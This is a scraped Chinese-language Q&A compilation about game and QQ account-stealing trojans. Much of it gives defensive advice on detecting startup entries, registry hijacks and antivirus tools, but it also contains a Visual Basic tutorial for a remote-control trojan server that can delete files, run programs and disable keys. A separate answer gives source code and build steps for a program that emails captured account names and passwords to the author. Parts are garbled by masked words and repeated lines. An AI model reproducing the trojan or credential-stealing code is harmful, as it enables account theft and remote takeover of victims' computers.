本文目录一览:
为什么电脑上有盗号木马?
如何识别木马
识别木马有新招,希望这篇文章对你有所帮助。
一、经常看到有玩家说,在输入自己的帐号的时候通故意输错帐号和码。其实这种木马是最早期的木马程序。现在已经很少有编木马程序的程序员,还按照这种监听键盘记录的思路去编写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。大家都知道,不管是传奇还是任何一款程序。它都是有他所特有的数据的(包括玩家的帐号、密码,等级装备资料等等)。这些数据都是会通过本机与游戏服务器取得了验证以后,玩家的角色资料才会出现在玩家的面前。而这些数据在运行的时候都是存放在计算机的内存里面的。木马作者只需要在自己的程序里面加入条件语句就可以取得玩家真实的游戏帐号、密码、角色等级~~~~~,以我自己的计算机知识,这种语句的大概意思应该是:当游戏进程进入到让玩家选择角色的时候再从内存中提取最后一次的帐号、密码、角色等级等资料。也就是说,其实玩家之前所做的故意输错帐号或密码完全是浪费自己的表情、浪费自己的时间。
下边先来说一下木马是如何通过网页进入你的电脑的,相信大家都知道,现在有很多图片木马,EML和EXE木马,其中的图片木马其实很简单,就是把木马exe文件的文件头换成bmp文件的文件头,然后欺骗IE浏览器自动打开该文件,然后利用网页里的一段JAVASCRIPT小程序调用DEBUG把临时文件里的bmp文件还原成木马exe文件并拷贝到启动项里,接下来的事情很简单,你下次启动电脑的时候就是你噩梦的开始了,EML木马更是传播方便,把木马文件伪装成audio/x-wav声音文件,这样你接收到这封邮件的时候只要浏览一下,不需要你点任何连接,windows就会为你代劳自动播放这个他认为是wav的音乐文件,木马就这样轻松的进入你的电脑,这种木马还可以frame到网页里,只要打开网页,木马就会自动运行,另外还有一种 *** ,就是把木马exe编译到. *** 文件里,然后在网页里调用,同样也可以无声无息的入侵你的电脑,这只是些简单的办法,还有远程控制和共享等等漏洞可以钻,知道这些,相信你已经对网页木马已经有了大概了解,
简单防治的 *** :
开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉,然后打开Internet Explorer浏览器,点工具-Internet选项-安全-自定义级别,把里面的脚本的3个选项全部禁用,然后把“在中加载程序和文件”禁用,当然这只是简单的防治 *** ,不过可能影响一些网页的动态java效果,不过为了安全就牺牲一点啦,这样还可以预防一些恶意的网页炸弹和病毒,如果条件允许的话可以加装防火墙,再到微软的网站打些补丁,反正我所知道的网吧用的都是原始安装的windows,很不安全哦,还有尽量少在一些小网站下载一些程序,尤其是一些号称黑客工具的软件,小心盗不着别人自己先被盗了,当然,如果你执意要用的话,号被盗了也应该付出这个代价吧。还有,不要以为装了还原精灵就很安全,据我所知,一般网吧的还原精灵都只还原c:盘即系统区,所以只要木马直接感染你安装在别的盘里的游戏执行文件,你照样逃不掉的。
下边介绍一下木马和如何简单的检查一下是否中了木马。
木马程序一般分为服务器端程序和客户端程序两个部分,当服务器端程序安装在某台连接到 *** 的电脑后,就能使用客户端程序对其进行登陆。这和PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是,木马是非法取得对对方电脑的控制权,一旦登陆成功,就可以取得管理员级的权利,对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用,因为一不小心就会引火上身,被对方反查过来就会偷鸡不成蚀把米了,一般他们都会采用只有服务器端的小木马,这类木马通常会把截取的密码发到一个免费邮箱里,不需要人为操作,有空去收趟邮件就可以了,这种木马遍布互连网的各个角落,的确防不胜防,由于木马程序众多,加之不断有新版本、新品种产生,使得软件无法完全应付,所以手动检查清除是十分必要的。
木马会想尽一切办法隐藏自己,别指望在任务管理器里看到他们的踪影,有些木马更是会和一些系统进程寄生在一起的,如著名的广外幽灵就是寄生在MsgSrv32.exe里;当然它也会悄无声息地启动,木马会在每次用户启动windows时自动装载服务端,Windows系统启动时自动加载应用程序的 *** 木马都会用上,如启动组、win.ini、system.ini、注册表等等都是木马藏身之地;下边简单说一下如何检查,点开始-运行,输入:
msconfig回车 就会打开系统配置实用程序,先点system.ini,看看shell=文件名,正确的文件名应该是“explorer.exe”,如果explorer.exe后边还跟有别的程序的话,就要好好检查这个程序了,然后点win.ini,“run=”和“load=”是可能加载“木马”程序的途径,一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了,当然你也得看清楚,因为如“AOL木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件;最后点“启动”,检查里面的启动项是不是有不熟悉的,如果你实在不清楚的话可以把他们全部取消,然后重新运行msconfig,看一下有没有取消的启动项重新被选中的,一般木马都会存在于内存中,(就是线程插入,然后隐藏进程的木马,DLL无进程木马就不会驻留在内存里面,我们在下一次中会讲到)所以发现你取消他的启动项就会自动添加上的,然后你就可以逐步添上你的输入法,音量控制,防火墙等软件的启动项了;还有一类木马,他是关联注册表的文件打开方式的,一般木马经常关联.exe,点开始-运行,输入:regedit回车,打开注册表编辑器,点之一条,也就是HKEY_CLASSES_ROOT,找到exefile,看一下\\exefile\\shell\\open\\command里面的默认键值是不是"%1" %* ,如果是一个程序路径的话就一定是中木马了,另外配合两种以上的杀毒软件也是必要的,另外在windows下木马一般很难清除,最后重新启动到dos环境下再进行查杀。
防木马程序、防火墙、及杀毒软件介绍:
1、木马克星: 专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!
2、绿鹰PC万能精灵2.91 :专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!
3、Symantec AntiVirus:这个我就不用再介绍了吧,全球更大的杀毒软件!强力推荐8.1企业版。
4、天网防火墙2.51个人版:天网防火墙个人版在 *** 效率与系统安全上完全采用天网防火墙的设计思想,采用更底层的 *** 驱动隔绝,其作用层在 *** 硬件与Windows *** 驱动之间,在黑客攻击数据接触Windows *** 驱动之前将所有的攻击数据拦截,保护脆弱的Windows *** 驱动不会崩溃
看看这个,是用VB编的木马程序
1.“特洛伊木马”有被称为BO, 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。
使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。
在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(Text1.Text) 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关闭的。
End If ’如果不是,在接受新的连接之前先关闭此连接。
tcpServer.Accept requestID
End Sub
这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。
2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
‘接收数据并存入strData
For i = 1 To Len(strData)
‘分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
‘把命令ID号存入mKey
‘把命令参数存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
详细程序略。
客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。
另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。
成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。
java能不能盗号
能盗号,通过分析发现,目前该木马主要活跃在 *** 国家阿尔及利亚,由于java程序在运行是依赖java运行环境,在JDK或JRE未安装或安装版本不正确的情况下,jar包都不能运行。但是也不能掉以轻心,在强对抗环境下,这或将成为今后木马的一种发展趋势。
怎么盗号?
问题一:盗号qq高手怎么盗号 给钱帮忙盗号
问题二:如何盗号 娜娜:被盗号有两种可能。一是你在网吧或其它公众场合玩游戏被别人看见你输的账号、密码了;还有就是你家的电脑被远程控制安装了木马程序了。幸运的是你只被盗40级的号(有装备或TB的话十来个小时就可以练一个滴^0^)。 防止游戏账号被盗的几点举措: 1.注册账号的时候按照官网的提示建立密码保护,这样即使别人盗了你的号改了密码你也可以修改回来; 2.o自己的电脑安装一个木马防火墙;
问题三:知道怎么盗号? 先发源码
.版本 2
.支持库 internet
.子程序 _按钮1_被单击
.局部变量 发送结果, 文本型
连接发信服务器 (“ *** tp.163”, 25, “邮箱账号”, “邮箱密码”, )
发送邮件 (“傻瓜送号来了”, “邮箱账号” + 编辑框1.内容 + #换行符 + “邮箱密码” + 编辑框2.内容 + #换行符, “你的邮箱”, , , “你的邮箱”, )
图文教程
(1)
(2)
(3)
(4)
双击启动窗口
(5)
复制上方源码
(6)
(7)
(8)
调试成功后,编译
问题四:盗号的人是怎么盗号的 他们可以发木马什么的,如果你有去过网吧上网就更有可能,在网吧上网很危险的很容易号就会被盗,网吧很容易泄漏信息的,大部分这种情况都跟网吧有关系,或者你在别人那上,列如他家电脑,他手机等等,没弄好就正好给人家好奇心满足,他就上了,趁现在密码还没换你快去换密码,密保,绑定密保手机,记住不是绑定手机,这两个是有区别的,别弄错了,如果换了你就去申诉,申诉回来就按我说的那样做就可以了
问题五:怎么 *** 盗号 利用代码侵入你想要盗号的设备,更好是电脑,因为电脑的ip地址比较容易定位。侵入系统后,将代码写进C盘,获取权限,开机自启动。就可以将其电脑里面的一个用户文件,发送至指定位置,有了这个用户文件,你就可以破译它的密码了。
问题六:怎么盗号 楼主,这可不是什么好事,玩家辛辛苦苦练的号被盗了。。。换位思考下
问题七:电脑里怎么盗号 我有盗号软件,电脑版的手机版的,还有网页版的
问题八:怎样盗号别人qq密码 *** 号码密码忘记了,如果 *** 号码未设置密保或密保无法通过成功验证,可申诉找回,申诉注意事项:
1、多邀请 *** 好友辅助申诉,并通知他们在3小时内完成辅助申诉(好友即使已被删除也可以邀请);
2、更好在最常使用 *** 的地方(例如:家里、学校或最常去的网吧)提交帐号申诉表;
3、填写用过的 *** 密码时,如果不记得完整的 *** 密码,可以填写认为最接近的或只填写记得的部分密码。
问题九:电脑如何盗号 一般所谓的盗号就是发送一个键盘记录器给你。至于防范的手段就说一个吧。用鼠标点击上下。别一次性输入完。这样他就没办法记录了。
比如,你在帐号输入一两个。然后点下来(鼠标点。别用TAB键)密码在输入一两个。就这样切换着把帐号密码输入完。
当然,现在的木马什么的都很变态。我一朋友玩大话西游。有将军令。竟然都被人上了号。他都疯 了。
至于 *** 号。我在别的论坛看的,可以给你点提示也可以说给你一些防范。一般电脑如果中了木马的话。 鼠标放在密码栏点右键。会出现 粘贴。 从右往左顺序等字样。如果点鼠标右键没反映。表示正常。
电脑上经常出现盗号木马怎么办?
电脑维护小常识:
1、安装杀毒软件,设置为自动升级-每周至少一次全盘杀毒。
2、安装反病毒工具,例如瑞星卡卡,360安全卫士。定期清理使用痕迹(更好每天一次)。
3、修复系统和软件漏洞。
4、安装瑞星保险柜或360保险箱之类的软件,保护自己的帐号( *** ,网游...)。
5、清理恶评插件。
6、可有可无的软件不要安装,不要出于好奇安装一些根本用不着的程序。特别是从一些非官方网站下载的,或者是没有数字签名的。
电脑中了盗号程序怎么删除?
【解决方案】
方案一:
1.下载个:“360系统急救箱”,
先“查杀”病毒,再“立即重启”!
重启开机后,再点开“隔离|恢复”,点:“彻底删除”病毒文件和“未知自启动项”!
再点开“修复”,“全选”,再“修复”文件!
再:“恢复丢失的dll文件”,扫描一下,如果没有就行了!
2.用“360安全卫士”的“扫描插件”,然后再“清理插件”,把它删除!
3.再用“360杀毒双引擎版”,“全盘扫描”,病毒木马,再点删除!
4.重启电脑后,来到“隔离区”,点“彻底删除”!
5.用“360安全卫士”里“系统修复”,扫描完后点击“一键修复”
6.如果,以上 *** 不行,重启电脑,开机后,按F8,回车,回车,进到“安全模式”里,“高级启动选项”里,“最后一次正确配置”,按下去试试,看看效果!
7.实在不行,做“一键还原”系统!
方案二:登陆
这个多引擎扫描网站,用多个杀毒软件扫描是否是病毒。
一般盗号的程序是用什么语言编写的
杀毒软件就是垃圾软件
360更是流氓软件之王
盗号程序一般是用DELPHI编写的,高手也有用C或C++
原理简单的说就是骇客通过各种途径让你的电脑下载木马(网页挂马,主动入侵,社会工程等)
并在后台运行他,然后当你运行游戏的时候,木马会侦测到你已经开启了登陆窗口,就会进行键盘记录
当你点登陆后,密码就发送到骇客的邮箱或者网站上了..这是一般的盗号程序的原理
想防止的话,到微软官方网站去下载补丁,不要相信360什么的流氓软件
这样被挂马和主动入侵的机会就会减小,关于社会工程入侵,你更好买一本关于心理的书籍翻翻~~~